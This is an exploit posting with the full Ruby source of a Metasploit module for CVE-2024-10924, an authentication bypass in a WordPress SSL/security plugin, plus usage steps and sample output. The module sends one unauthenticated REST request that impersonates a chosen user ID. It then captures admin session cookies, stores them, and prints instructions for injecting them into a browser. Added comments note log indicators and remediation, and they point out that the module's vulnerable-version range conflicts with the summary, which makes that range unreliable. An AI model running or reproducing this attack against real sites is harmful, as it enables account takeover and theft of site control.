=============================================================================================================================================
| # Title : WordPress Really Simple Security 9.1.1.1 authentication bypass vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214234/ & CVE-2024-10924
[+] Summary : This module exploits an authentication bypass vulnerability (CVE-2024-10924) in the Really Simple SSL plugin for WordPress (versions <= 9.1.1.1).
The vulnerability exists in the skip_onboarding REST API endpoint.
When exploited, the module allows unauthenticated attackers to gain full administrator access by impersonating a valid user ID.
[+] Usage :
# 1. Vulnerability Check
msf6 > use exploit/multi/http/wordpress_really_simple_ssl_auth_bypass
msf6 exploit(...) > set RHOSTS target.com
msf6 exploit(...) > set TARGETURI /wordpress
msf6 exploit(...) > check
[+] target.com:80 - Vulnerable version 8.1.3 detected
# 2. Exploiting the Vulnerability to Obtain Cookies
msf6 exploit(...) > exploit
[*] Starting authentication bypass attempt...
[+] Authentication bypass successful!
[+] Admin access confirmed!
[+] MANUAL EXPLOITATION INSTRUCTIONS
======================================
[+] Authentication Bypass Successful!
Cookies obtained: wordpress_logged_in_abc=...
[+] Next Steps:
1. Visit: http://target.com/wordpress/wp-admin
2. Use cookies from above
3. You should have admin access
# 3. Manual Exploitation
# Using curl or your browser with cookies
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpClient

  # Defender notes, derived only from what this listing shows:
  #  - The version fingerprint in `check` relies on the plugin's readme.txt
  #    under wp-content/plugins/ being directly readable; the bypass request
  #    in `exploit` does not use that file at all.
  #  - The bypass is a single unauthenticated POST to
  #    wp-json/reallysimplessl/v1/two_fa/skip_onboarding; POST requests to that
  #    route in web server access logs are the indicator the IOC_IN_LOGS note
  #    below refers to.
  #  - Remediation is updating the plugin to a fixed release (see the vendor
  #    advisory under 'References'). The version boundary used in this module
  #    (8.1.5) disagrees with this page's own summary (<= 9.1.1.1), so do not
  #    derive the fixed version from this code.

  # Module metadata and the two user-settable options.
  #
  # Options registered below:
  #   TARGETURI - base path of the WordPress install (default '/')
  #   USER_ID   - WordPress user ID placed in the request body (default 1)
  #
  # NOTE(review): RELIABLE_SIDE_EFFECTS is not a Reliability value I recognise
  # from the framework's notes vocabulary — confirm it resolves when the module
  # is loaded.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WordPress Really Simple SSL Plugin Authentication Bypass',
      'Description' => %q{
This module exploits an authentication bypass vulnerability (CVE-2024-10924)
in the Really Simple SSL plugin for WordPress (versions < 8.1.5).
The vulnerability exists in the skip_onboarding REST API endpoint.
When exploited, the module allows unauthenticated attackers to gain
full administrator access by impersonating a valid user ID.
},
      'Author' => [
        'JoshuaProvoste', # Original Discovery
        'indoushka' # Professional Refinement
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2024-10924'],
        ['URL', 'https://www.wordfence.com/blog/2024/11/critical-authentication-bypass-vulnerability-patched-in-really-simple-ssl-plugin/'],
        ['URL', 'https://really-simple-ssl.com/cve-2024-10924-authentication-bypass/']
      ],
      'DisclosureDate' => '2024-11-06',
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'Targets' => [
        # NOTE(review): this range and the one in `check` (8.1.5) do not match
        # the page summary (<= 9.1.1.1) or the current plugin name in the title
        # ("Really Simple Security"); confirm against the referenced advisories.
        ['WordPress Really Simple SSL < 8.1.5', {}]
      ],
      'DefaultTarget' => 0,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [RELIABLE_SIDE_EFFECTS],
        # Every request this module sends (readme.txt GET, REST POST,
        # wp-admin GET) is visible in ordinary web server logs.
        'SideEffects' => [IOC_IN_LOGS]
      }
    ))
    register_options([
      OptString.new('TARGETURI', [true, 'The base path to WordPress', '/']),
      OptInt.new('USER_ID', [true, 'User ID to impersonate (Administrator is usually 1)', 1])
    ])
  end

  # Fingerprints the plugin version from the publicly readable readme.txt.
  #
  # Returns:
  #   CheckCode::Unknown - no HTTP response at all
  #   CheckCode::Appears - readme served with the 'Really Simple SSL' marker and
  #                        its first 'Stable tag' parses below 8.1.5
  #   CheckCode::Safe    - parsed version is 8.1.5 or newer; ALSO returned (bare,
  #                        via the last line) when the readme is missing, lacks
  #                        the marker string, or has no parseable 'Stable tag'.
  #                        A renamed or hardened install may therefore read as
  #                        Safe rather than Unknown.
  def check
    vprint_status("Checking Really Simple SSL version...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'wp-content/plugins/really-simple-ssl/readme.txt')
    })
    return CheckCode::Unknown('Target unreachable') unless res
    if res.code == 200 && res.body.include?('Really Simple SSL')
      # First 'Stable tag: x.y.z' occurrence is taken as the installed version.
      version = res.body.scan(/Stable tag:\s*([\d.]+)/).flatten.first
      if version
        vprint_status("Found version: #{version}")
        if Rex::Version.new(version) < Rex::Version.new('8.1.5')
          return CheckCode::Appears("Vulnerable version #{version} detected")
        end
        return CheckCode::Safe("Version #{version} is not vulnerable")
      end
    end
    CheckCode::Safe
  end

  # Sends one unauthenticated POST to the skip_onboarding REST route and, if
  # the response sets a WordPress auth cookie, verifies and stores it.
  #
  # Side effects: sets @cookies (read by verify_admin_access and
  # report_instructions); on a successful admin check writes the raw cookies to
  # loot and prints follow-up instructions.
  # Aborts via fail_with(Failure::NoAccess) when there is no response or the
  # response carries no wordpress_logged_in_ / wordpress_sec_ cookie.
  def exploit
    api_path = normalize_uri(target_uri.path, 'wp-json', 'reallysimplessl', 'v1', 'two_fa', 'skip_onboarding')
    print_status("Attempting authentication bypass on #{datastore['RHOST']}...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => api_path,
      'headers' => { 'Content-Type' => 'application/json' },
      'data' => {
        'user_id' => datastore['USER_ID'],
        # No nonce is fetched beforehand; a random value is sent, so the
        # request carries nothing that ties it to an existing session.
        'login_nonce' => Rex::Text.rand_text_alphanumeric(14),
        'redirect_to' => '/wp-admin/'
      }.to_json
    })
    # Success is judged solely by a Set-Cookie for a WordPress auth cookie.
    unless res && res.get_cookies =~ /wordpress_(logged_in|sec)_/
      fail_with(Failure::NoAccess, "Bypass failed. No valid session cookies found in response.")
    end
    @cookies = res.get_cookies
    print_good("Successfully obtained authentication cookies.")
    print_status("Verifying administrative access...")
    if verify_admin_access
      print_good("Admin access confirmed via dashboard check!")
      # The loot entry holds the raw session cookies for the impersonated user.
      loot_path = store_loot(
        'wp.cookies',
        'text/plain',
        datastore['RHOST'],
        @cookies,
        'wordpress_session_cookies',
        "CVE-2024-10924 Auth Bypass - User ID: #{datastore['USER_ID']}"
      )
      print_status("Session cookies stored at: #{loot_path}")
      report_instructions
      return # explicit exit; the else branch below is the only other path
    else
      # A cookie was issued but the admin page check failed — the module
      # treats this as a non-admin USER_ID and only prints what it got.
      print_warning("Cookies obtained but admin verification failed. User ID might not have admin rights.")
      print_line("Cookies: #{@cookies}")
    end
  end

  # Heuristic admin check using the cookies captured in `exploit`.
  #
  # Fetches wp-admin/plugin-install.php with @cookies and returns true only if
  # the response is 200, the body mentions 'plugin-install.php' and does not
  # mention 'wp-login.php' (taken as a sign the request was not bounced to the
  # login form). It is string-based and does not otherwise confirm the
  # impersonated user's role.
  def verify_admin_access
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'plugin-install.php'),
      'cookie' => @cookies
    })
    res && res.code == 200 && res.body.include?('plugin-install.php') && !res.body.include?('wp-login.php')
  end

  # Prints a banner with the admin URL, the cookies held in @cookies and three
  # follow-up steps. Output only; no requests are made here.
  def report_instructions
    admin_url = full_uri(normalize_uri(target_uri.path, 'wp-admin/'))
    print_line("\n" + "="*70)
    print_line(" EXPLOITATION COMPLETED SUCCESSFULLY")
    print_line("="*70)
    print_line("Admin URL: #{admin_url}")
    print_line("Cookies: #{@cookies}")
    print_line("\nInstructions:")
    print_line("1. Open your browser and navigate to the Admin URL.")
    print_line("2. Use a cookie editor extension to inject the cookies above.")
    print_line("3. Refresh the page to access the WordPress dashboard.")
    print_line("="*70 + "\n")
  end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================